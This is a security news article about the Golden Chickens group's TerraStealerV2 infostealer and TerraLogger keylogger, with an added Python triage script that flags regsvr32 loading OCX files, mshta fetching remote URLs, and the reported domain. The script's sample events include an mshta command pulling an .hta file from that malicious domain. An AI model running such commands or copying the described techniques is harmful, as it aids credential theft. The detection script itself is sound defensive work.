Golden Chickens Group Unleashes Two New Malware Families: TerraStealerV2 and TerraLogger



The cybercrime group known as Golden Chickens, also called Venom Spider, has been linked to two newly discovered malware families named TerraStealerV2 and TerraLogger. These new tools suggest ongoing efforts by the group to expand and refine its malicious capabilities.

According to cybersecurity researchers at Recorded Future’s Insikt Group, TerraStealerV2 is designed to steal browser credentials, cryptocurrency wallet data, and information from browser extensions. TerraLogger, by contrast, is a standalone keylogger that records keystrokes using low-level keyboard hooks and saves the data in local files.

Golden Chickens has been active since at least 2018 and is known for offering its malware under a Malware-as-a-Service (MaaS) model. The group has ties to a known online identity called badbullzvenom, believed to be operated by individuals from Canada and Romania. Their previously known malware includes More_eggs, VenomLNK, TerraLoader, TerraCrypt, and RevC2.

Technical Details of the New Malware

TerraStealerV2 is distributed through various file types such as EXE, DLL, MSI, and LNK files. In all cases, the malware payload is delivered as an OCX (OLE Control Extension) file retrieved from an external domain, wetransfers[.]io.

While TerraStealerV2 targets Chrome’s 'Login Data' to steal credentials, it does not bypass Chrome’s Application Bound Encryption (ABE), introduced in updates after July 2024. This suggests that the malware is either outdated or still being developed.

The stolen data is sent to both Telegram and the wetransfers[.]io domain. The malware also uses trusted Windows tools like regsvr32.exe and mshta.exe to avoid detection.

TerraLogger, also delivered as an OCX file, focuses on recording keystrokes but does not currently include features for data exfiltration or command-and-control communication. Experts believe it may be used alongside other malware tools within the Golden Chickens ecosystem.
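
A small triage pass over process-creation events for the behaviours described above (regsvr32.exe loading an OCX file, mshta.exe, and the reported domain), added here as an example and not taken from the Insikt Group report or this article. The event fields, paths and file names are constructed, and treating a URL argument to mshta.exe as worth review is an assumption.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Domain exactly as the article gives it (defanged); refanged only to match.
IOC_DOMAIN = "wetransfers[.]io".replace("[.]", ".")
HOST_RE = re.compile(r"https?://([^/\s\"':]+)", re.I)
OCX_RE = re.compile(r"\.ocx\b", re.I)

def on_ioc_domain(host):
    # Exact host or subdomain only, so one-letter lookalikes do not match.
    return host == IOC_DOMAIN or host.endswith("." + IOC_DOMAIN)

def triage(event):
    """Return the reasons one process-creation event deserves a look."""
    image = basename(event["image"]).lower()
    cmd = event["command_line"]
    hosts = [h.lower() for h in HOST_RE.findall(cmd)]
    reasons = []
    if image == "regsvr32.exe" and OCX_RE.search(cmd):
        reasons.append("regsvr32 registering an OCX file")
    if image == "mshta.exe" and hosts:  # assumption: URL argument is worth review
        reasons.append("mshta given a remote URL")
    if any(on_ioc_domain(h) for h in hosts):
        reasons.append("command line references reported domain")
    return reasons

def scan(events):
    """Map event index -> reasons, for events with at least one hit."""
    hits = {i: triage(e) for i, e in enumerate(events)}
    return {i: r for i, r in hits.items() if r}

# Constructed sample events (hypothetical paths and file names).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Users\Public\sample.ocx"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": f"mshta.exe https://{IOC_DOMAIN}/placeholder.hta"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\codec.dll"'},
    {"image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe -O https://wetransfer.com/placeholder.zip"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["command_line"], "->", reasons)
```

The last sample event uses a host that differs from the reported domain by one letter and is deliberately not flagged, since the match is on the exact host or its subdomains.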

Growing Threat Landscape

Security experts say these tools are still under active development and lack the stealth typically seen in mature Golden Chickens malware. However, the group's history indicates that more advanced versions are likely to emerge in the future.

The discovery of TerraStealerV2 and TerraLogger comes at a time when several new stealer malware families have also been identified, including Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer. These programs are designed to steal a broad range of personal and sensitive information.

In addition, an updated version of another malware family, StealC (version 2.2.4), was spotted in March 2025. It includes improved delivery through MSI and PowerShell scripts, encrypted communications, and a new control panel with advanced customization features. StealC V2 is being spread using another malware loader known as Amadey.

Cybersecurity experts continue to monitor these developments closely, warning that cybercriminals are increasingly using sophisticated methods to target victims and steal data.

